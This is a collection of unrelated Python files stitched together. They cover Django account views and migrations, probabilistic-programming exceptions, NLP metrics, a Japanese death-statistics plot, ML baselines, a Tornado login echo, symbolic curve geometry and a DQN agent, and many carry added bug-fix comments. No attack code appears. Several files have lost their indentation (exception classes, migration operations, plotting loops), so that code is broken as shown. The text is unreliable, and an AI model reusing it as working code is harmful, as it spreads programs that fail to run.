                    upstream_job_names.append(
                        '{prefix}_sync-packages-to-{repo}_{code_name}_{arch}'.format(
                            prefix=get_release_job_prefix(rosdistro),
                            repo=repo,
                            code_name=code_name,
                            arch=arch))
    else:
        # Bug fix: the original used `"...{}." % repo`, mixing %-formatting with a
        # str.format template — that raises TypeError instead of the intended error.
        raise JobValidationError(
            "Unknown upstream jobs for job 'upload_{}'.".format(repo))
    upstream_job_names.append('import_upstream')
    return ','.join(sorted(upstream_job_names))
if __name__ == '__main__':
    # Allow running this module as a script; exit with main()'s return code.
    sys.exit(main())
|
from django.shortcuts import render,redirect
from accounts.forms import (
RegistrationForm,
EditProfileForm
)
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserChangeForm,PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
# from django.contrib.auth.decorators import
from django.views.generic import TemplateView
from django.shortcuts import render
#from accounts.forms import ProfileForm
#from accounts.models import UserProfile
from django.contrib.auth.decorators import login_required
# class ProfileView(TemplateView):
# template_name='accounts/profile.html'
# def get(self,request):
# form=ProfileForm()
# return render(request, self.template_name,{'form':form})
# Create your views here.
def home(request):
    """Render the landing page with a small demo context."""
    numbers = [1, 2, 3, 4, 5]
    name = 'Milan'
    args = {'myName': name, 'numbers': numbers}
    # Bug fix: the context dict was built but never passed to render(), so the
    # template silently saw no 'myName'/'numbers' variables.
    return render(request, 'accounts/home.html', args)
def register(request):
    """Show the signup form; create the account and go to /accounts on success."""
    if request.method == 'POST':
        form = RegistrationForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('/accounts')
        # Invalid submission: fall through and re-render with errors.
    else:
        form = RegistrationForm()
    return render(request, 'accounts/reg_form.html', {'form': form})
# def logout(request):
# auth_logout(request)
# return redirect('/')
@login_required
def view_profile(request):
    """Render the logged-in user's profile page."""
    return render(request, 'accounts/profile.html', {'user': request.user})
@login_required
def edit_profile(request):
    """Let the logged-in user edit their own profile."""
    if request.method == "POST":
        form = EditProfileForm(request.POST, instance=request.user)
        if form.is_valid():
            form.save()
            return redirect('/accounts/profile')
        # Invalid submission: fall through and re-render with errors.
    else:
        form = EditProfileForm(instance=request.user)
    return render(request, 'accounts/edit_profile.html', {'form': form})
@login_required
def change_password(request):
    """Change the authenticated user's password, keeping them logged in.

    Fixes vs. original:
    * requires login like the sibling profile views — ``PasswordChangeForm``
      needs a real user, not ``AnonymousUser``;
    * the failure redirect used the relative path 'accounts/change_password'
      (resolved against the current URL); made absolute.
    """
    if request.method == "POST":
        form = PasswordChangeForm(data=request.POST, user=request.user)
        if form.is_valid():
            form.save()
            # Re-hash the session auth key so the user is not logged out
            # by their own password change.
            update_session_auth_hash(request, form.user)
            return redirect('/accounts/profile')
        else:
            return redirect('/accounts/change_password')
    else:
        form = PasswordChangeForm(user=request.user)
        args = {'form': form}
        return render(request, 'accounts/change_password.html', args)
# def edit_userprofile(request):
# if request.method == 'POST':
# form = UserChangeForm(request.POST) |
# /*
# * Copyright 2018 IBM Corporation
# *
# * Licensed under the Apache License, Version 2.0 (the "License");
# * you may not use this file except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# */
class DeepPPLException(Exception):
    """Root of the DeepPPL exception hierarchy."""
    pass
class TranslationException(DeepPPLException):
    """Base for translation errors; subclasses provide a ``_base_msg`` template.

    Positional arguments are interpolated into ``_base_msg`` and also kept
    verbatim in ``self.args``.
    """

    def __init__(self, *args):
        message = self._base_msg.format(*args)
        super(TranslationException, self).__init__(message)
        self.msg = message
        # Restore the raw arguments (super().__init__ set args to (message,)).
        self.args = args

    def __str__(self):
        return self.msg
class MissingPriorNetException(TranslationException):
_base_msg = "The following parameters of {} were not given a prior:{}"
class MissingGuideNetException(TranslationException):
_base_msg = "The following parameters of {} were not given a guide:{}"
class MissingModelException(TranslationException):
_base_msg = "The following latents {} were not sampled on the model."
class MissingGuideException(TranslationException):
_base_msg = "The following latents {} were not sampled on the guide."
class ObserveOnGuideException(TranslationException):
    # Fixed typo in the user-facing message: "observer" -> "observe".
    _base_msg = "Trying to observe data {} inside the guide."
class UnsupportedProperty(TranslationException):
_base_msg = "Unsupported property: {}."
class UndeclaredParametersException(TranslationException):
_base_msg = "Use of undeclared parameters: {}."
class UndeclaredNetworkException(TranslationException):
_base_msg = "Use of undeclared network: {}."
class InvalidSamplingException(TranslationException):
_base_msg = "Only identifiers and indexing are supported as lhs of sampling: {}."
class UndeclaredVariableException(TranslationException):
_base_msg = "Undeclared identifier: {}."
class UnknownDistributionException(TranslationException):
_base_msg = "Unknown distribution: {}."
class AlreadyDeclaredException(TranslationException):
_base_msg = "Variable '{}' already declared."
class IncompatibleShapes(TranslationException):
_base_msg = "Trying to use incompatible shapes:{} and {}"
class IncompatibleTypes(TranslationException):
_base_msg = "Trying to unify incompatible types:{} and {}"
class IncompatibleDimensions(IncompatibleTypes):
_base_msg = "Trying to unify incompatible dimensions:{} and {}"
class UnderspecifiedDimension(IncompatibleTypes):
_base_msg = "The dimension of {} could not be inferred ({}) "
class NonRandomSamplingException(TranslationException):
_base_msg = "Invalid sampling statement: '{}'. Trying to sample a non-random variable?"
|
__author__ = 'Julie'
import re,math
wordposPATT=re.compile('(.*)/(.*)')
def untag(wordpos):
    """Split a ``word/pos`` token into ``(word, pos)``.

    The word half is greedy, so ``'a/b/NN'`` -> ``('a/b', 'NN')``.
    Returns ``('', '')`` (after printing a warning) when no slash matches.
    """
    # Match inline: the re module caches compiled patterns, so this is
    # equivalent to the module-level wordposPATT without depending on it.
    matchobj = re.match(r'(.*)/(.*)', wordpos)
    if matchobj:
        return (matchobj.group(1), matchobj.group(2))
    else:
        # print() form is valid on both Python 2 and 3
        # (the original bare print statement is Python-2-only).
        print("Warning: Does not match word/pos pattern: " + wordpos)
        return ("", "")
def fscore(TP, FP, FN):
    """Return ``(precision, recall, F1)`` from raw counts.

    Degenerate denominators are handled: no predicted positives gives
    precision 1, no actual positives gives recall 1, and when
    ``precision + recall == 0`` F1 is defined as 0 — the original raised
    ZeroDivisionError in that case.
    """
    if TP + FP == 0:
        precision = 1
    else:
        precision = float(TP) / (float(TP) + float(FP))
    if TP + FN == 0:
        recall = 1
    else:
        recall = float(TP) / (float(TP) + float(FN))
    if precision + recall == 0:
        f = 0
    else:
        f = 2 * precision * recall / (precision + recall)
    return (precision, recall, f)
def mymean(list, k):
    """Return ``(mean, sd, interval)`` of the values in *list*.

    ``interval`` is the half-width ``k * sd / sqrt(n)`` (e.g. k = 1.96 for
    a ~95% confidence interval). Parameter name ``list`` is kept for
    backward compatibility although it shadows the builtin.
    """
    n = 0
    total = 0
    totalsquare = 0
    for item in list:
        n += 1
        total += float(item)
        totalsquare += float(item) * float(item)
    mean = total / n
    # Population variance via E[x^2] - E[x]^2.
    var = totalsquare / n - mean * mean
    if var < 0:
        # Guard against tiny negative values from floating-point error.
        print("Warning: negative variance " + str(var))
        var = 0
    sd = math.pow(var, 0.5)
    # Renamed from `int`, which shadowed the builtin.
    interval = k * sd / math.pow(n, 0.5)
    return (mean, sd, interval)
def f_analyse(actual, results):
    """Return ``(accuracy, precision, recall, F1)`` for two parallel 0/1 lists.

    Fixes vs. original:
    * iterates with ``zip`` instead of ``pop()``, so the caller's lists
      are no longer emptied as a side effect;
    * zero denominators yield 0.0 instead of raising ZeroDivisionError;
    * prints use the py2/py3-compatible function form.
    """
    if len(actual) != len(results):
        print("Error: two lists not of same length: " + str(len(actual)) + ", " + str(len(results)))
    TP = TN = FP = FN = 0
    for thisactual, thisresult in zip(actual, results):
        if thisactual == 1:
            if thisresult == 1:
                TP += 1
            else:
                FN += 1
        else:
            if thisresult == 1:
                FP += 1
            else:
                TN += 1
    total = TP + FP + TN + FN
    if total == 0:
        # Both inputs empty: nothing to score.
        return (0.0, 0.0, 0.0, 0.0)
    acc = float(TP + TN) / float(total)
    pre = float(TP) / float(TP + FP) if TP + FP else 0.0
    rec = float(TP) / float(TP + FN) if TP + FN else 0.0
    f = 2 * pre * rec / (pre + rec) if pre + rec else 0.0
    return (acc, pre, rec, f)
# Smoke test: half the labels agree, so all four metrics should be 0.5.
if __name__ == "__main__":
    a1 = [1, 1, 1, 1, 0, 0, 0, 0]
    r1 = [1, 1, 0, 0, 1, 1, 0, 0]
    # print() form works on Python 2 and 3 (was a py2 print statement).
    print(f_analyse(a1, r1))
#! /usr/bin/env python3
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import datetime
# Monthly Japanese death counts; column headers are Japanese (年=year, 月=month).
df = pd.read_csv("../data/japandeaths.csv")
# One timestamp (first of each month) per row, used as the x-axis below.
t = [datetime.datetime(int(x["年"]), int(x["月"]), 1) for i, x in df.iterrows()]
def days(year, month=None):
    """Return the day count of *year*, or of *month* within *year* if given."""
    year = int(year)
    # Gregorian rule: divisible by 4, except centuries not divisible by 400.
    is_leap = year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
    if month is None:
        return 366 if is_leap else 365
    month = int(month)
    lengths = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
    if month == 2 and is_leap:
        return 29
    return lengths[month - 1]
perday1 = np.array([r[2] / days(r[0], r[1]) for i, r in df.iterrows()]) # 確定数
perday2 = np.array([r[3] / days(r[0], r[1]) for i, r in df.iterrows()]) # 概数
perday3 = np.array([r[4] / days(r[0], r[1]) for i, r in df.iterrows()]) # 速報値
plt.clf()
plt.plot(t, perday1, "o-")
plt.plot(t, perday2, "s-")
plt.plot(t, perday3, "*-")
plt.ylabel("1日あたり死亡数")
plt.legend(["確定数", "概数", "速報値"])
plt.show()
plt.savefig("../img/japandeaths1.svg", bbox_inches="tight")
df["死亡数"] = [n3 if np.isnan(n1) and np.isnan(n2) else n2 if np.isnan(n1) else n1
for n1, n2, n3 in zip(df["確定数"], df["概数"], df["速報値"])]
df["日数"] = [days(year, month) for year, month in zip(df["年"], df["月"])]
plt.clf()
for y in sorted(set(df["年"])):
df1 = df[df["年"] == y]
plt.plot(df1["月"], df1["死亡数"] / df1["日数"],
alpha=0.5, marker=f"${y % 10}$", label=y)
plt.xlabel("月")
plt.ylabel("1日あたり死亡数")
plt.legend(loc=(0.38, 0.60), labelspacing=0.1)
plt.show()
plt.savefig("../img/japandeaths2.svg", bbox_inches="tight")
plt.clf()
for m in range(1, 13):
df1 = df[df["月"] == m]
plt.plot(df1["年"], df1["死亡数"] / df1["日数"], marker=f"${m}$")
plt.ylabel("1日あたり死亡数")
plt.xticks(sorted(set(df["年"] // 2 * 2).intersection(set(df["年"]))))
plt.show()
plt.savefig("../img/japandeaths3.svg", bbox_inches="tight")
exit()
#------
df1 = df.groupby("年")[["死亡数", "日数"]].sum()
df2 = df1[df1.index < 2023]
y = df2.index
x = df2["死亡数"] / df2["日数"]
plt.clf()
plt.plot(y, x, "o-")
plt.xlabel("年")
plt.ylabel("1日あたり死亡数")
plt.xticks(sorted(set(y // 2 * 2).intersection(set(y))))
plt.show()
plt.savefig("../img/japandeaths4.svg", bbox_inches="tight")
u = (2012 <= y) & (y <= 2019)
slope, intercept = np.polyfit(y[u], x[u], 1)
plt.clf()
plt.plot(y, x - (slope * y + intercept), "o-")
plt.axhline(linewidth=0.5, color="black")
plt.xlabel("年")
plt.ylabel("1日あたり超過死亡数")
plt.plot([2020, 2021, 2022], [3459 / 366, (18385 - 3459) / 365, (57266 - 18385) / 365], "o-")
plt.xticks(sorted(set(y // 2 * 2).intersection(set(y))))
plt.show()
plt.savefig("../img/japandeaths5.svg", bbox_inches="tight")
# df3 = df.query("月 <= 4").groupby("年")[["死亡数", "日数"]].sum()
# y = df3.index
# x = df3["死亡数"] / df3["日数"]
# plt.clf()
# plt.plot(y, x, "o-")
# plt.xlabel("年")
# plt.ylabel("1〜4月の1日あたり死亡数")
# plt.xticks(sorted(set(y // 2 * 2).intersection(set(y)))) # 2年ごと
# plt.show()
# plt.savefig("../img/japandeaths6.svg", bbox_inches="tight")
exit()
#------
df = pd.read_csv("https://covid19.mhlw.go.jp/public/opendata/deaths_cumulative_daily.csv",
parse_dates=['Date'])
a = np.arange(np.datetime64("2020-06"), np.datetime64("2023-03"))
da = pd.to_datetime(a)
da1 = da - np.timedelta64(1,"D")
da1s = pd.Series(da1, name='Date')
df2 = pd.merge(da1s, df).diff()
x = df2.ALL / (df2.Date / np.timedelta64(1,"D"))
for i in range(1, len(x)):
print(f"{a[i-1]},{x[i]:3.1f}")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-03-18 02:45
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='RankedCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('normalized_name', models.CharField(max_length=128)),
('total_count', models.IntegerField()),
],
options={
'db_table': 'category_ranks',
'managed': False,
},
),
migrations.CreateModel(
name='Bounty',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('bounty_id', models.IntegerField()),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('deadline', models.DateTimeField()),
('data', models.CharField(max_length=128)),
('issuer', models.CharField(max_length=128)),
('arbiter', models.CharField(max_length=128, null=True)),
('fulfillmentAmount', models.DecimalField(decimal_places=0, max_digits=64)),
('paysTokens', models.BooleanField()),
('bountyStage', models.IntegerField(choices=[(0, 'Draft'), (1, 'Active'), (2, 'Dead'), (3, 'Completed'), (4, 'Expired')], default=0)),
('old_balance', models.DecimalField(decimal_places=0, max_digits=64, null=True)),
('balance', models.DecimalField(decimal_places=0, default=0, max_digits=70, null=True)),
('title', models.CharField(blank=True, max_length=256)),
('description', models.TextField(blank=True)),
('bounty_created', models.DateTimeField(null=True)),
('tokenSymbol', models.CharField(default='ETH', max_length=128)),
('tokenDecimals', models.IntegerField(default=18)),
('tokenContract', models.CharField(default='0x0000000000000000000000000000000000000000', max_length=128)),
('usd_price', models.FloatField(default=0)),
('issuer_name', models.CharField(blank=True, max_length=128)),
('issuer_email', models.CharField(blank=True, max_length=128)),
('issuer_githubUsername', models.CharField(blank=True, max_length=128)),
('issuer_address', models.CharField(blank=True, max_length=128)),
('sourceFileName', models.CharField(blank=True, max_length=256)),
('sourceFileHash', models.CharField(blank=True, max_length=256)),
('sourceDirectoryHash', models.CharField(blank=True, max_length=256)),
('webReferenceUrl', models.CharField(blank=True, max_length=256)),
('platform', models.CharField(blank=True, max_length=128)),
('schemaVersion', models.CharField(blank=True, max_length=64)),
('schemaName', models.CharField(max_length=128, null=True)),
('data_categories', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('data_issuer', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('data_json', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, unique=True)),
('normalized_name', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='Fulfillment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fulfillment_id', models.IntegerField()),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('fulfillment_created', models.DateTimeField(null=True)),
('data', models.CharField(max_length=128)),
('accepted', models.BooleanField()),
('fulfiller', models.CharField(max_length=128)),
('fulfiller_name', models.CharField(blank=True, max_length=128)),
('fulfiller_email', models.CharField(blank=True, max_length=128)),
('fulfiller_githubUsername', models.CharField(blank=True, max_length=128)),
('fulfiller_address', models.CharField(blank=True, max_length=128)),
('description', models.TextField(blank=True)),
('sourceFileName', models.CharField(blank=True, max_length=256)),
('sourceFileHash', models.CharField(blank=True, max_length=256)),
('sourceDirectoryHash', models.CharField(blank=True, max_length=256)),
('platform', models.CharField(blank=True, max_length=128)),
('schemaVersion', models.CharField(blank=True, max_length=64)),
('schemaName', models.CharField(blank=True, max_length=128)),
('data_fulfiller', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('data_json', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('bounty', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fulfillments', to='std_bounties.Bounty')),
],
),
migrations.CreateModel(
name='Token',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('normalized_name', models.CharField(max_length=128)),
('name', models.CharField(max_length=128)),
('symbol', models.CharField(max_length=128)),
('price_usd', models.FloatField(default=0, null=True)),
],
),
migrations.AddField(
model_name='bounty',
name='categories',
field=models.ManyToManyField(null=True, to='std_bounties.Category'),
),
migrations.AddField(
model_name='bounty',
name='token',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='std_bounties.Token'),
),
]
|
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score, roc_curve, confusion_matrix
from sklearn.utils import shuffle
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB, BernoulliNB
import models
from data.utils import load_sparse_csr, generate_folder
# (display name, estimator class) pairs evaluated on every feature folder.
MODELS = [('Logistic Regression', LogisticRegression), ('NaiveBayes-Bernoulli', BernoulliNB), ('NaiveBayes-Gaussian', GaussianNB)]

# results[<folder>(train|test)][<model name>] -> accuracy
results = {}
for (FOLDER, folder_title) in generate_folder('./data', folder_titles=True):
    X_train = load_sparse_csr(FOLDER + 'X_train.csr.npz')
    Y_train = np.load(FOLDER + 'Y_train.npy')
    X_test = load_sparse_csr(FOLDER + 'X_test.csr.npz')
    Y_test = np.load(FOLDER + 'Y_test.npy')
    # Shuffle the training split only; test-set order does not matter.
    X_train, Y_train = shuffle(X_train, Y_train)
    # GaussianNB cannot consume sparse matrices, so densify both splits.
    X_train = X_train.toarray()
    X_test = X_test.toarray()
    results[folder_title + '(train)'] = {}
    results[folder_title + '(test)'] = {}
    for (model_name, model) in MODELS:
        print('Model: ' + model_name)
        print('Features:' + FOLDER)
        # Fit the model
        m = model()
        m.fit(X_train, Y_train)
        # NOTE: the original computed Y_train_pred from X_test and
        # Y_test_pred from X_train (arguments swapped) and used neither;
        # the mislabeled dead predictions are removed.
        print('Training Accuracy:')
        train_acc = m.score(X_train, Y_train)
        print(train_acc)
        print('Testing Accuracy:')
        test_acc = m.score(X_test, Y_test)
        print(test_acc)
        results[folder_title + '(train)'][model_name] = train_acc
        results[folder_title + '(test)'][model_name] = test_acc
        # print('Training Confusion')
        # print(confusion_matrix(m.predict(X_train), Y_train))
        # print('Testing Confusion')
        # print(confusion_matrix(m.predict(X_test), Y_test))
pd.DataFrame(results).to_pickle('./baseline_results.pickle')
#encoding=utf-8
import tornado.web
import tornado.ioloop
from tornado.escape import json_encode
class IndexHandler(tornado.web.RequestHandler):
    """Serves the login page at ``/``."""

    def get(self, *args, **kwargs):
        # Use a forward slash: the original 'templates\login.html' relied on
        # a backslash path that only works on Windows (and is one escape
        # character away from breaking, e.g. '\t' or '\n' in a filename).
        self.render('templates/login.html')
class LoginHandler(tornado.web.RequestHandler):
    """Echoes the submitted ``(name, pwd)`` pair back as a JSON array."""

    def get(self, *args, **kwargs):
        # Credentials arrive as query-string arguments.
        credentials = [self.get_argument('name'), self.get_argument('pwd')]
        self.write(json_encode(credentials))

    def post(self, *args, **kwargs):
        # Credentials arrive in the request body.
        credentials = [self.get_body_argument('name'), self.get_body_argument('pwd')]
        self.write(json_encode(credentials))
# Route table: / -> login page, /login/ -> credential echo endpoint.
app = tornado.web.Application([
    (r'^/$',IndexHandler),
    (r'^/login/$',LoginHandler),
])
# Listen on port 8888 and block in the IOLoop until interrupted.
app.listen(8888)
tornado.ioloop.IOLoop.instance().start()
|
from anoky.syntax.form import Form
from anoky.syntax.node import Element
from anoky.syntax.util import is_identifier, identifier_in
from anoky.transducers.arrangement_rule import ArrangementRule
class RightLeftBinaryOperator(ArrangementRule):
    """Arrangement rule turning ``a ⋅ X b`` into the form ``⦅X a b⦆``
    for operator identifiers listed in ``sym_vals``.

    ::

        ⋅ ⦅X a b⦆ a ⋅ X b
    """

    def __init__(self, sym_vals):
        # NOTE(review): the rule's display name says "Left-Right" while the
        # class is named RightLeft — kept as-is since it is a runtime string.
        ArrangementRule.__init__(self, "Left-Right Binary Operator")
        self.sym_vals = sym_vals

    def applies(self, element: Element):
        # Fires on an identifier element whose code matches one of our
        # operator symbols and which has both a left and a right neighbour.
        return (
            is_identifier(element.code) and
            identifier_in(element.code, self.sym_vals) and
            not element.is_first() and
            not element.is_last()
        )

    def apply(self, element):
        # Splice the two neighbours out of the parent form and re-attach
        # them as operands of a new form headed by the operator itself.
        form = element.parent
        p = element.prev
        n = element.next
        form.remove(p)
        form.remove(n)
        new_form = Form(element.code, p, n)
        new_form_element = form.replace(element, new_form)
        # Resume the transducer scan at the element before the new form.
        return new_form_element.prev
from lib.Storage import Storage
from utils import Transmitter, Singleton, Worker
class StorageManager(metaclass=Singleton):
    """Singleton facade that starts/stops the storage transmitter."""

    def __init__(self):
        # Transmitter dispatches incoming requests to the StorageWorker.
        self.__transmitter = Transmitter(StorageWorker)
        # Health monitoring is not wired up yet (see commented calls below).
        self.__health_monitor = None

    def start(self):
        """Begin accepting storage traffic."""
        self.__transmitter.start()
        # self.__health_monitor.start()

    def stop(self):
        """Stop accepting storage traffic."""
        self.__transmitter.stop()
        # self.__health_monitor.stop()
class StorageWorker(Worker, metaclass=Singleton):
    """Singleton worker forwarding TCP payloads to the Storage backend."""

    def __init__(self):
        # The started Storage instance serves as the TCP-side executor;
        # there is no UDP side for storage traffic.
        file_system_worker = Storage()
        file_system_worker.start()
        super().__init__(tcp_worker=file_system_worker, udp_worker=None)

    def run(self, _, data, address):
        # First positional argument (connection/worker id) is unused here.
        self._tcp_worker.execute(data, address)

    def stop(self):
        self._tcp_worker.stop()
|
# Generated by Django 3.1 on 2020-11-09 05:45
from django.db import migrations
class Migration(migrations.Migration):
    # Merge migration: reconciles the two divergent leaf migrations
    # (0009 and 0008) without applying any schema changes itself.

    dependencies = [
        ('app1', '0009_auto_20201107_2123'),
        ('app1', '0008_booking_booking_date'),
    ]

    operations = [
    ]
|
from tensorboard_logger import Logger
# Log two demo scalar series to ./experiment_cnn for TensorBoard.
logger = Logger(logdir='experiment_cnn', flush_secs=2)
for i in range(100):
    logger.log_value('loss', 10 - i ** 0.5, step=i)
    # Fix: pass step=i here too — the original omitted it only for
    # 'accuracy', leaving that series on an implicit step counter
    # inconsistent with 'loss'.
    logger.log_value('accuracy', i ** 0.5 / 10, step=i)
import sympy as sp
import numpy as np
# from sympy import cos, sin, exp
# CC: is this above line useful here ?
t = sp.Symbol("t")
class Boundary:
    """
    Geometric features of a boundary curve parametrised by the symbol ``t``.

    Attributes
    ==========

    y: parametrization of the boundary (sequence of sympy expressions in t)
    yp: first derivative (velocity) of the parametrization
    ypp: second derivative (acceleration) of the parametrization
    J: Jacobian (speed |y'|) of the parametrization
    τ: unit tangent vector to the boundary
    ν: unit normal vector to the boundary (2-D only)
    κ: signed curvature of the boundary (2-D only)
    """

    def __init__(self, b):
        # b: sequence of sympy expressions in the module-level symbol t.
        self.y = b

    @property
    def yp(self):
        # Component-wise first derivative with respect to t.
        return [sp.diff(p, t) for p in self.y]

    @property
    def ypp(self):
        # Component-wise second derivative with respect to t.
        return [sp.diff(p, t) for p in self.yp]

    @property
    def J(self):
        # Speed |y'(t)| = sqrt(sum of squared velocity components).
        v2 = [i ** 2 for i in self.yp]
        sv2 = sum(v2)
        return sp.sqrt(sv2).simplify()

    @property
    def τ(self):
        # Unit tangent: velocity normalised by the speed.
        return [p / self.J for p in self.yp]

    @property
    def ν(self):
        # Unit normal: the tangent rotated by -90 degrees, (x, y) -> (y, -x).
        if len(self.y) == 2:
            tmp = (self.yp[1] / self.J, -self.yp[0] / self.J)
            return tmp
        else:
            raise ValueError("Need to define the normal vector for higher dimensions")

    @property
    def κ(self):  # curvature kappa
        # Signed curvature (x'y'' - y'x'') / |y'|^3 for a planar curve.
        if len(self.y) == 2:
            tmp = (self.yp[0] * self.ypp[1] - self.yp[1] * self.ypp[0]) / self.J ** 3
            return tmp.simplify()
        else:
            raise ValueError("Need to define the mean curvature for higher dimensions")

    def items(self):  # all elements of the class
        # Symbolic versions of every geometric quantity, in a fixed order.
        list_elem = ["y", "yp", "ypp", "J", "τ", "ν", "κ"]
        return [getattr(self, p) for p in list_elem]

    def items_lambdified(self):  # lambdified all elements
        # Numeric (callable-in-t) versions of items().
        return [sp.lambdify(t, p) for p in self.items()]
def lclassB(B):
    """
    Attach lambdified (numeric) versions of a Boundary's attributes.

    For each symbolic attribute ``a`` among y, yp, ypp, J, τ, ν, κ, a
    vectorised numeric callable is stored on ``B`` under ``a + "_l"``.

    Parameters
    ==========

    B: Boundary instance

    Returns
    ==========

    The same Boundary instance, with the ``*_l`` attributes added.
    """
    for name in ("y", "yp", "ypp", "J", "τ", "ν", "κ"):
        numeric = np.vectorize(sp.lambdify(t, getattr(B, name)))
        setattr(B, name + "_l", numeric)
    return B
|
# Fix: the original `from heapq import heapq` raises ImportError (the heapq
# module has no attribute named "heapq"), and `List` was never imported.
import heapq
from typing import List


class Solution:
    def minMeetingRooms(self, intervals: List[List[int]]) -> int:
        """
        Purpose: Returns the min. no. of conference rooms required, given an array
        of meeting time `intervals` where intervals[i] = [start_i, end_i].

        A min-heap of end times tracks rooms in use; the earliest-ending
        room is reused whenever it frees up before the next meeting starts.
        """
        if not intervals: return 0
        free_rooms = []
        # Process meetings in start-time order.
        intervals.sort(key= lambda x: x[0])
        heapq.heappush(free_rooms, intervals[0][1])
        for interval in intervals[1:]:
            # Heap root is the room that frees up earliest.
            if free_rooms[0] <= interval[0]:
                heapq.heappop(free_rooms)
            heapq.heappush(free_rooms, interval[1])
        return len(free_rooms)
from prac_06.guitar import Guitar
# Demo: age and vintage status of a 1922 Gibson L-5 CES priced at $16,035.40.
gibson = Guitar("Gibson L-5 CES", 1922, 16035.40)
print(gibson.get_age())  # Expected answer is 98
print(gibson.is_vintage())  # Expected answer is True
import random
import numpy as np
class Agent(object):
    """Glue between an environment and a Q-network: epsilon-greedy stepping
    plus train/test/play loops (including a two-player variant)."""

    def __init__(self, env, net, args):
        self.env = env
        self.net = net
        # Training epsilon
        self.exploration_rate_start = args.exploration_rate_start
        self.exploration_rate_end = args.exploration_rate_end
        self.exploration_rate_test = args.exploration_rate_test
        self.exploration_decay_steps = args.exploration_decay_steps
        # Linear per-step decrement taking epsilon from start to end.
        self.exploration_decay = (args.exploration_rate_start - args.exploration_rate_end) / args.exploration_decay_steps
        self.total_train_steps = 0
        self.train_frequency = args.train_frequency
        self.train_repeat = args.train_repeat
        self.target_steps = args.target_steps
        self.random_starts = args.random_starts
        self.history_length = args.history_length
        # Statistics
        self.callback = None

    def _epsilon(self):
        """Current exploration rate under the linear annealing schedule."""
        if self.total_train_steps < self.exploration_decay_steps:
            return self.exploration_rate_start - self.total_train_steps * self.exploration_decay
        else:
            return self.exploration_rate_end

    def _reset_random(self):
        """Reset the environment and burn in a random number of no-op steps."""
        # Reset environment
        self.env.reset()
        # Perform random number of dummy actions to produce more stochastic games
        for _ in range(random.randint(self.history_length, self.random_starts) + 1):
            noop = 0
            screen, reward, terminal = self.env.step(noop)
            if terminal:
                self.env.restart()
            # Add dummy states to buffer
            self.net.remember(noop, reward, screen, terminal, training=False)

    def _step(self, exploration_rate, action_b=0, training=True):
        """Take one epsilon-greedy step; returns (action, reward, terminal, screen)."""
        # Predict action
        action = self.net.forward(exploration_rate)
        # Execute action on environment
        screen, reward, terminal = self.env.step(action, action_b)
        # Save current data to memory and buffer
        self.net.remember(action, reward, screen, terminal, training=training)
        # Reset after terminal state
        if terminal:
            # Reset environment
            self._reset_random()
        # Calculate statistics
        if self.callback:
            self.callback.on_step(action, reward, terminal, screen, exploration_rate)
        return action, reward, terminal, screen

    def play_random(self, random_steps):
        """Fill replay memory by acting fully at random (epsilon = 1)."""
        # Reset environment
        self.env.reset()
        # Play given number of steps
        for _ in range(random_steps):
            # Do random action
            _, _, _, _ = self._step(1)

    def train(self, train_steps):
        """Run the training loop for the given number of environment steps."""
        # Reset environment
        self._reset_random()
        total_reward = 0.0
        # Train for given number of steps
        for i in range(train_steps):
            # Count current step
            self.total_train_steps += 1
            # Execute step on agent
            _, reward, terminal, _ = self._step(self._epsilon())
            total_reward += reward
            # Update target model
            if self.target_steps >= 1 and i % self.target_steps == 0:
                self.net.update_target_model()
            # Train network
            if i % self.train_frequency == 0:
                for _ in range(self.train_repeat):
                    self.net.backward()
            # Print results on terminal state
            if terminal:
                print("Train episode ended with score: " + str(total_reward) + " on step " + str(self.total_train_steps))
                total_reward = 0.0

    def test(self, test_steps):
        """Run evaluation steps with the fixed test epsilon (no learning)."""
        # Reset environment
        self._reset_random()
        total_reward = 0.0
        # Test for given number of steps
        for _ in range(test_steps):
            # Execute step on agent
            _, reward, terminal, _ = self._step(self.exploration_rate_test, training=False)
            total_reward += reward
            # Print results on terminal state
            if terminal:
                print("Test episode ended with score: " + str(total_reward))
                total_reward = 0.0

    def play(self):
        """Play a single episode to completion and print its score."""
        # Reset environment
        self._reset_random()
        terminal = False
        total_reward = 0.0
        while not terminal:
            # Execute step on agent
            _, reward, terminal, _ = self._step(self.exploration_rate_test, training=False)
            total_reward += reward
        # Print results
        print("Play episode ended with score: " + str(total_reward))

